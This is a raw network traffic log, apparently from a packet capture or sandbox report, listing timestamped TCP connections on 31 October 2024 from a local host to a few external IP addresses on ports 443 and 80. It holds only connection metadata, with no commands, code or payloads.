                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797389030 CET44351253162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797389984 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797413111 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797454119 CET44351253162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797465086 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797528982 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797554970 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797569990 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797610998 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797631979 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797688007 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797714949 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.797728062 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.806701899 CET44351253162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.736522913 CET44351253162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.736635923 CET44351253162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.736677885 CET44351253162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.736699104 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.736726999 CET44351253162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.736768007 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.736776114 CET44351253162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.736803055 CET44351253162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.736845016 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.737678051 CET51253443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.738023043 CET5125280192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.743495941 CET8051252208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:57.743556023 CET5125280192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:59.298523903 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:59.298571110 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:59.298635006 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:59.299005032 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:59.299017906 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.074460030 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.074594975 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.078840017 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.078861952 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.079309940 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.089721918 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.131339073 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.325459003 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.325490952 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.325510979 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.325579882 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.325609922 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.325658083 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.347300053 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.347340107 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.347376108 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.347404957 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.347418070 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.347444057 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.448554993 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.448590994 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.448719025 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.448748112 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.452053070 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.469980001 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.470019102 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.470057964 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.470081091 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.470098972 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.470114946 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.471792936 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.471812010 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.471873999 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.471887112 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.472013950 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.473498106 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.473522902 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.473551989 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.473562002 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.473587036 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.473601103 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.572154045 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.572185040 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.572254896 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.572280884 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.572300911 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.572336912 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.592933893 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.592957973 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.593030930 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.593059063 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.593841076 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.593863010 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.593888998 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.593899012 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.593914986 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.593940020 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.594774961 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.594789028 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.594831944 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.594840050 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.595719099 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.595737934 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.595767021 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.595777035 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.595819950 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.595830917 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.596662998 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.596678972 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.596724033 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.596738100 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.598156929 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.598176956 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.598213911 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.598233938 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.598253012 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.598272085 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.612329006 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.694605112 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.694691896 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.694751978 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.694808960 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.717601061 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.717649937 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.717670918 CET51254443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.717679024 CET4435125413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.992965937 CET51255443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.993011951 CET4435125513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.993709087 CET51255443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.994294882 CET51255443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.994312048 CET4435125513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.994906902 CET51256443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.994934082 CET51257443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.994951010 CET4435125613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.994966030 CET4435125713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.995034933 CET51256443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.995194912 CET51256443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.995198011 CET51257443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.995199919 CET4435125613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.995332956 CET51257443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.995343924 CET4435125713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.995909929 CET51258443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.995920897 CET4435125813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.995968103 CET51259443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.995976925 CET4435125913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.995997906 CET51258443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.996031046 CET51259443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.996114969 CET51258443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.996126890 CET4435125813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.996241093 CET51259443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:00.996256113 CET4435125913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.724587917 CET4435125713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.725339890 CET4435125813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.725868940 CET51257443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.725889921 CET4435125713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.726416111 CET51257443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.726423025 CET4435125713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.726763010 CET51258443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.726798058 CET4435125813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.727215052 CET51258443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.727230072 CET4435125813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.734596014 CET4435125913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.738394022 CET4435125613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.739764929 CET51259443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.739774942 CET4435125913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.741233110 CET51259443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.741238117 CET4435125913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.741607904 CET51256443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.741643906 CET4435125613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.742131948 CET51256443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.742144108 CET4435125613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.749735117 CET4435125513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.750647068 CET51255443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.750672102 CET4435125513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.751087904 CET51255443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.751094103 CET4435125513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855093956 CET4435125713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855119944 CET4435125713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855175018 CET51257443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855194092 CET4435125713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855243921 CET4435125813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855295897 CET4435125713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855302095 CET4435125813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855370045 CET51257443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855375051 CET51258443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855469942 CET51258443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855489969 CET4435125813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855499983 CET51257443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855504036 CET51258443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855511904 CET4435125813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855514050 CET4435125713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855525017 CET51257443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.855530024 CET4435125713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.858704090 CET51260443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.858730078 CET51261443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.858752966 CET4435126013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.858757973 CET4435126113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.858829975 CET51260443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.858989000 CET51261443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.858989954 CET51260443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.859004021 CET4435126013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.859016895 CET51261443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.859021902 CET4435126113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.866919041 CET4435125913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.867250919 CET4435125913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.867340088 CET51259443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.867374897 CET51259443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.867379904 CET4435125913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.867393017 CET51259443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.867397070 CET4435125913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.869621992 CET51262443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.869642019 CET4435126213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.869718075 CET51262443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.869889021 CET51262443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.869904995 CET4435126213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.870506048 CET4435125613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.870529890 CET4435125613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.870588064 CET51256443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.870603085 CET4435125613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.870624065 CET4435125613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.870642900 CET51256443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.870672941 CET51256443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.870712996 CET51256443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.870728016 CET4435125613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.870743990 CET51256443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.870762110 CET4435125613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.872629881 CET51263443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.872652054 CET4435126313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.872772932 CET51263443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.872857094 CET51263443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.872870922 CET4435126313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.883981943 CET4435125513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.884005070 CET4435125513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.884067059 CET51255443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.884088993 CET4435125513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.884134054 CET51255443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.884140968 CET4435125513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.884152889 CET4435125513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.884196997 CET51255443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.884263992 CET51255443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.884274960 CET4435125513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.884284973 CET51255443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.884289980 CET4435125513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.886212111 CET51264443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.886226892 CET4435126413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.886374950 CET51264443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.886441946 CET51264443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:01.886455059 CET4435126413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.597718954 CET4435126213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.601455927 CET51262443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.601485014 CET4435126213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.601972103 CET51262443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.601980925 CET4435126213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.607280016 CET4435126313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.607660055 CET51263443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.607676983 CET4435126313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.608074903 CET51263443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.608079910 CET4435126313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.609736919 CET4435126013.107.246.45192.168.2.4
